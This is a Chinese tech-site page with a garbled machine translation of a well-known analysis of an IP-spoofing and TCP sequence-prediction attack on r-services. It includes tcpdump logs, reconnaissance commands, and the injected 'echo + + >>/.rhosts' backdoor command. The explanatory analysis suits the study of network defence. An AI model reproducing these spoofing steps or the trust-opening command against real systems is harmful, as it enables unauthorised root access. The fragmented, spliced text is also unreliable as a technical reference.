最新标注
热门标注
历史更新
站点地图
RSS
Home
CrazyCoder
»
原创
»
it评论
»
it业界
»
互联网
»
精品软件
开发语言
»
网络编程
编程综合
嵌入式开发
算法
英文资料
汇编语言
PowerBuilder
p2p技术
验证码识别
DotNet
Java教程
C语言教程
C 教程
Delphi教程
VB教程
QQ协议开发
项目管理
»
数据库
»
Web开发
»
Python
Css教程
XML教程
网页特效
PhotoShop教程
Illustrator教程
CorelDraw教程
Ruby教程
CorelDraw教程
网站安全
开发平台-工具
Web
PHP教程
Flash教程
Ajax教程
Javascript教程
Html教程
Dreamweaver
Asp教程
技术综合
»
软件测试
办公软件
QQ相关
Windows
网络技术
游戏开发
软件工程
软件教程
编程思想
游戏开发
外挂开发
OpenApi
AutoCad
广告设计
3D设计
平面设计相关
移动手机开发
服务器
»
Linux
Unix/FreeBsd
web服务器
服务器技术
安全
博文摘选
»
翻译
首页
»
安全
» 黑客攻击:黑客技术介绍的利用ip序列攻击
Rss订阅
黑客攻击:黑客技术介绍的利用ip序列攻击
on 2009-9-12
in
安全
|
0 Comment
提到很多有关 IP地址
欺骗( IP spoofing )和hijacking攻击
这儿是我
些技术资料
希望它能帮助你明白这类攻击是如何
回事
这是两种截然区别
攻击手段
IP 源地址欺骗和 TCP 序列序列预报是为了获得那些使用 X terminal作为无盘工作站
使用权
当root 权限被获得时
个已知
到其他系统
连接就会被“可加载内核 STREAMS 模块”或 hijacked
这次攻击中
数据记录都是由 tcpdump 来完成
兴趣很明确(也很短!)
有些Ri期被遗漏了
我特别推荐 Steve Bellovin
有关“IP spoofing”
文章
他对 TCP 握手描述
非常详细
也提出了怎样阻止这种攻击手段
我
设置是这样
:
系 统 = 运行Solaris 1 提供 "X terminal"服务
SPARC 工作站 x-terminal = 运行Solaris 1 提供 "X terminal"服务 目 标 = 攻击显然
目标
IP spoofing 攻击是从 14:09:32 PST _disibledevent=>数据包
记录):
14:09:32 toad.com# finger -l @target 14:10:21 toad.com# finger -l @server 14:10:50 toad.com# finger -l root@server 14:11:07 toad.com# finger -l @x-terminal 14:11:38 toad.com# showmount -e x-terminal 14:11:49 toad.com# rpcinfo -p x-terminal 14:12:05 toad.com# finger -l root@x-terminal
这样
探测是为了查看在这些系统的中有什么信赖关系
借此可以发动 IP spoofing 攻击
从 showmount 和 rpcinfo
源端口可以看出是toad.com
root
6分钟的后
我们收到了大量
TCP SYN 请求(TCP 连接
请求)
是来自 130.92.6.97 到服务器上
513 (login) 端口
这些 SYN 请求
目
就是堵塞513端口
连接队列
使其成为半开连接状态
因此无法接受其它
新
连接请求
详细些就是
它是不会对那些SYN-ACK 请求发送TCP RST回应
513 端口是
个“特权”(< IPPORT_RESERVED)端口
server.login 可以被假定
源地址安全
使用
是在UNIX上
"r-服务" (rsh,rlogin)进行地址spoofing攻击
130.92.6.97 明显是没有反应
地址(对收到
数据包):
14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096 14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096 14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096 14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096 14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096 14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096 14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096 14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0) win 4096 14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096 14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0) win 4096 14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0) win 4096 14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0) win 4096 14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972x-terminal.shell: R 1382726997:1382726997(0) win 0 14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell: S 1382726997:1382726997(0) win 4096 14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993: S 2022720000:2022720000(0) ack 1382726998 win 4096 14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell: R 1382726998:1382726998(0) win 0 14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell: S 1382726998:1382726998(0) win 4096 14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack 1382726999 win 4096 14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win 0 14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096 14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096 14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0 14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096 14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096 14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0 14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096 14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096 14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0 14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096 14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096 14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0 14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096 14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096 14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0 14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096 14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096 14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0 14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096 14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096 14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0 14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096 14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096 14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0 14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096 14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096 14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0 14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096 14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096 14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0 14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096 14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096 14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0
注意每个x-terminal送出
SYN-ACK 数据包通过 x-terminal 有个
数列
并且都比前
个来
大
我们看到
个伪造
SYN (连接请求)
是从 server.login 送到 x-terminal.shell
设想服务器如果被x-terminal所信任
那么x-terminal 就可以利用了(甚至
些伪装
服务器) 请求了
x-terminal 会对服务器回复
个 SYN-ACK
只有 ACK 过
才可以打开连接
服务器会丢失送到 server.login
数据包
所以ACK 也要伪造
通常情况下
SYN-ACK
数列需要用来生成有效
ACK
虽然这样
攻击者可以预知序列包含在 SYN-ACK 中
基于已知
x-terminal
tcp 序列生成规律
下面还可以用 ACK 来对付那些没有看见
SYN-ACK:
14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096 14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096
现在被 spoofing
机器现在只有
种思路方法连接到x-terminal.shell服务器就是 server.login
它可以维护连接 connection 和 send 请求可以通过完全ACK 掉
应该像下面这样:
14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096 14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096 14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096
相当于:
14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"
从第
个 spoofed
数据包共用了:< 16 秒
时间欺骗
;连接已经被终止了:
14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096 14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096 14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096 14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096 14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096
我们现在看到 RST 释放了在 server.login 上
队列中
那些半连接和空连接:
14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096 14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096 14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096 14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096 14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096 14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096 14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096 14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096 14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096 14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096 14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096 14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096 14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096 14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096 14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096 14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096 14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096 14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096 14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096 14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096 14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096 14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096 14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096 14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096 14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096 14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096 14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096 14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096 14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096 14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096
server.login 又可以接受连接请求了
通过IP地址spoofing 成果获得root权限后
个叫做"tap-2
01"
内核模块被x-terminal 编译和安装:
x-terminal% modstat Id Type Loadaddr Size B-major C-major Sysnum Mod Name 1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha x-terminal% ls -l /dev/tap crwxrwxrwx 1 root 37, 59 Dec 25 14:40 /dev/tap
这是
个出现内核 STREAMS 模块
可以防到已有
STREAMS 堆栈和控制 tty device 上面
用户
上
篇文章: 抓住
只“肥”灰鸽子
下
篇文章: 入侵 6合彩--扩散性思维
利用
Tags:
黑客攻击工具
黑客攻击软件
腾讯被黑客攻击
黑客攻击
延伸阅读
2011-5-18
--
伪黑客,黑客拟攻击苹果电脑 采用伪防毒软件进行攻击
2011-5-10
--
索尼遭遇黑客攻击,NASA及斯坦福网站遭遇黑客攻击
2010-12-8
--
黑客攻击,Windows系统用户摆脱黑客攻击的方法
2011-4-7
--
黑客攻击索尼,索尼多个网站遭黑客攻击威胁后关闭
2010-12-8
--
黑客操作系统,检测不同操作系统下黑客发起的攻击
2011-5-12
--
黑客攻击,敦煌网确认遭黑客攻击 现已基本恢复访问
2010-12-8
--
黑客攻击,Winamp存在漏洞黑客可远程攻击
2011-1-9
--
wifi黑客,亚马逊云存安全问题 或被黑客利用攻击WIFI网络
2011-1-5
--
黑客攻击,浅谈黑客攻击
2009-9-12
--
黑客攻击:黑客如何实现网络过载攻击完全解析
最新评论
发表评论
昵称
评论
验证码
点击图片更换
赞助商广告
随机更新
浪漫的困惑,通道的困惑
一棵小树,Photoshop制作一棵长满绿叶的卡通小树
世博海报,世博海报大赛获奖作品欣赏
电影海报设计,电影《基督诞生记》海报设计
网页背景图象,用saveforweb优化网页图象
华沙双年展,第17届波兰华沙国际海报双年展获奖作品
满城尽带黄金甲,电影《满城尽带黄金甲》海报设计
PatrycjaJachimowska招贴设计
华沙双年展,第13届波兰华沙国际海报双年展获奖作品
华沙双年展,第19届波兰华沙国际海报双年展获奖作品
海报设计,AlejandroMagallanes海报设计(一)
华沙双年展,第14届波兰华沙国际海报双年展获奖作品
墨攻海报,电影《墨攻》海报设计欣赏
校正色偏,Photoshop快速调整色偏
华沙双年展,第12届波兰华沙国际海报双年展获奖作品
华沙双年展,第18届波兰华沙国际海报双年展获奖作品
德国平面设计大师,德国平面大师乌韦·勒施海报设计(二)
Photoshop数字绘景:风景照片变幽灵城堡
平面广告设计,ComedyCentralGermany平面广告设计
华沙双年展,第15届波兰华沙国际海报双年展获奖作品
夏洛特的网电影,电影《夏洛特的网》海报设计
ps中的色阶,Photoshop中色阶的妙用
潮流鞋子,Photoshop打造一款潮流鞋子广告海报
平面设计师,英国平面设计师ANTHONYBURRILL作品欣赏
可爱的小猫,Photoshop鼠绘可爱的小猫
PhotoshopCS2教程:1.6免费图片库StockPhotos
贝影解说词,关于影象密码作者的解说……PHOTOSHOP的重要性!
华沙双年展,第16届波兰华沙国际海报双年展获奖作品
海报设计,AliVazirian海报设计(四)
超强手绘技巧:照相写实的猫
热门标注
lodsys
(3)
左旋肉碱被曝光
(1)
搜房网珠海房价
(1)
搜房网房价
(1)
上海房价搜房网
(1)
哄抬房价
(1)
12生肖歌
(1)
搞笑之歌
(1)
qq空间歌怎么搞
(1)
鬼故事死谷
(1)
死谷盐湖
(1)
快玩广告
(1)
富士胶卷广告
(1)
柯达胶卷广告词
(1)
胶卷式广告
(1)
柯达胶卷广告
(1)
swc是什么文件
(1)
swc文件
(1)
flexswc
(1)
双玻组件参数
(1)
最近更新
网吧如何免费上网,在网吧上网如何保护隐私
分布式攻击,几种分布式攻击的防范(1)
tcpip,利用IRIS学习TCP/IP(下)(图)
网络安全:新手也能对付病毒--破解恶意网页十大
Win2000 Server入侵监测
Windows下权限设置详解
简明法语教程,DoS攻防简明问答
sygate,SyGate相关
服务器防火墙,巧用Windows 2003构筑校园网服务器防火墙
网络防火墙,传统网络防火墙的五大不足
加密解密,软件狗[Dongles]的加密与解密技术(2)
防火墙,再谈防火墙及防火墙的渗透
国内外著名的桥,国内外著名防火墙集锦
木马清除大师,几种木马手工清除方法
奥拉星初识异空间,初识HTTP协议
防火墙工作原理,防火墙的工作原理
损坏硬件的病毒,安全知识:不可不留神 病毒 损坏 硬件有七大损
网络安全讲座之:攻击与渗透(9)
瑞星卡卡上网助手,偏不迷信360看瑞星卡卡上网安全助手十大安保利
黑客攻防技术,黑客攻防技术内幕-解读黑客(3)
最新标注
发现新行星
(1)
笔尖下发现的行星
(1)
杭州思泉设计
(1)
饮水思泉
(1)
前置机的作用
(1)
悬而未决的问题
(1)
思泉语文论坛
(1)
什么是前置机
(1)
思泉语文
(1)
前置机英文
(1)
银行前置机
(1)
思泉crm
(1)
读取用户属性
(1)
盛大诉百度侵权案
(1)
魔方优化
(1)
游戏优化大师
(1)
李开复创建大学
(1)
植物大战僵尸4
(1)
人机大战象棋
(1)
中国象棋人机大战
(1)
最新评论